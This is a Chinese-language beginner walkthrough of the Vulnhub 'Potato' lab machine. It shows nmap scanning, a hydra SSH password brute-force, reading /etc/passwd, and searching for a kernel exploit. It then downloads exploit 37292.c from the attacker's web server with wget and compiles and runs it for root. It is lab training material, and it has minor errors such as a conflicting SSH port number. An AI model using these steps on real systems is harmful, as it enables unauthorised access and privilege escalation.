适合新手的Vulnhub简单靶机potato

目录

下载地址:

主机发现

信息收集

渗透过程

漏洞利用

flag


下载地址:

Potato (SunCSR): 1 ~ VulnHubicon-default.png?t=N7T8https://www.vulnhub.com/entry/potato-suncsr-1,556/

主机发现

确认靶机与攻击机在一个网段

靶机窗口

信息收集

扫描当前网段存活的主机

arp-scan -l

nmap看看都开放了那些端口

nmap -A -p- -sS -sC -T4 10.4.7.140

-A:启用操作系统检测、版本检测、脚本扫描和路由跟踪

-p:加端口号(指定端口扫描)

-p-:扫描所有端口(1-65535)

-sS:执行SYN扫描,选择SYN扫描时的默认扫描类型

-sC:使用默认脚本集进行扫描,相当于--script=default

-T4:将时间模版设置为激进,增加时间值以加快扫描速度

端口信息:

80tcp协议:是一个运行Apache HTTP服务器版本为2.4.7,该服务器安装在Ubuntu操作系统上

7210tcp协议:是一个运行ssh6.6.1p1版本的2ubuntu2.13的服务器

访问下他的网页 10.4.7.140

跟他的靶机名一样是个土豆

渗透过程

ssh爆破他的7120端口

hydra ssh://10.4.7.140:7120 -l potato -P /usr/share/wordlists/john.lst -vV -f -t 32

目的是通过使用给定的用户名和密码字典文件尝试连接到 SSH 服务器(在 IP 地址 10.4.7.140,端口 7120)

通过爆破获得了一个用户的账号密码

用户名:potato 

密码:letmein

然后远程登录一下(连接端口为7120)

ssh potato@10.4.7.140 -p 7120

看下都有哪些用户

cat /etc/password

通过之前的端口信息知道它用的是ubuntu的服务器

看下ubuntu的版本

cat /etc/*release

在kali里再打开一个终端,搜一下ubuntu 14.04版本的漏洞

searchploit ubuntu 14.04

searchploit 是一个漏洞查找工具

37292.c是一个利用漏洞的本地攻击代码,用于进行本地提权或执行其他操作

漏洞利用

将这个文件拷贝到当前目录

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

然后再kali开启web服务

python3 -m http.server 80

再到potato里把文件下载下来

wget http://10.4.7.138/37292.c

wget:用于再网络上下载文件

10.4.7.138:kali的ip

使用gcc将37292.层进行编译成一个可执行文件,名为exp

gcc 37292.c -o exp

然后执行这个exp文件,就获得root权限了

flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值